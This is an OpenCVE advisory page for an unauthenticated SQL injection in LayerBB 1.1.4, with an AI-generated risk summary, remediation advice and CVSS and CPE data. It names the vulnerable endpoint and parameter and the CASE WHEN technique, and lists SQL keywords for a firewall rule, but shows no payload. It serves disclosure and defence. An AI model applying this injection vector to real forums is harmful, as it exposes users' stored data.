Description
LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information.
Published: 2026-05-16
Score: 8.8 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

LayerBB 1.1.4 contains an SQL injection flaw that lets unauthenticated attackers build malicious queries through the search_query POST parameter. By inserting CASE WHEN expressions, the attacker can drill into database tables to read privileged information. This weakness is a classic input validation failure classified as CWE‑89 and can lead to full data exposure or further attack progression if the attacker gains write access.

Affected Systems

The vulnerability affects LayerBB Community Edition, specifically version 1.1.4; earlier minor releases in the 1.0.x and 1.1.x series are also listed in the CPE range but the exploit is confirmed against 1.1.4.

Risk and Exploitability

With a CVSS score of 8.8 the flaw is considered high severity. The EPSS score is not available, but the vulnerability is not listed in the CISA KEV catalog, indicating no publicly known widespread exploitation yet. Because authentication is not required and the attack vector is simple HTTP POST to /search.php, an attacker with network access to the application can exploit it out of band to read database contents, potentially leading to full compromise of the system.

Generated by OpenCVE AI on May 16, 2026 at 16:53 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Check for an official LayerBB update that repairs the search_query sanitization and apply it as soon as it becomes available.
  • If no update exists, revise the search.php logic to enforce strict validation or use parameterized queries so that any user‑supplied input cannot alter the SQL command structure.
  • Deploy a web application firewall rule that detects and blocks common SQL injection patterns, such as CASE WHEN, UNION, or other suspicious keywords, directed at the /search.php endpoint.

Generated by OpenCVE AI on May 16, 2026 at 16:53 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 16 May 2026 15:45:00 +0000

Type Values Removed Values Added
Description LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information.
Title LayerBB 1.1.4 SQL Injection via search_query Parameter
First Time appeared Layerbb
Layerbb layerbb
Weaknesses CWE-89
CPEs cpe:2.3:a:layerbb:layerbb:1.0.4:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.0.5:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.0.6:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.1.0:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.1.1:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.1.2:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.1.3:*:*:*:*:*:*:*
cpe:2.3:a:layerbb:layerbb:1.1.4:*:*:*:*:*:*:*
Vendors & Products Layerbb
Layerbb layerbb
References
Metrics cvssV3_1

{'score': 8.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}

cvssV4_0

{'score': 8.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Layerbb Layerbb
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-16T15:26:06.961Z

Reserved: 2026-02-01T11:24:18.720Z

Link: CVE-2021-47954

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-16T16:16:21.650

Modified: 2026-05-16T16:16:21.650

Link: CVE-2021-47954

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-16T17:00:13Z

Weaknesses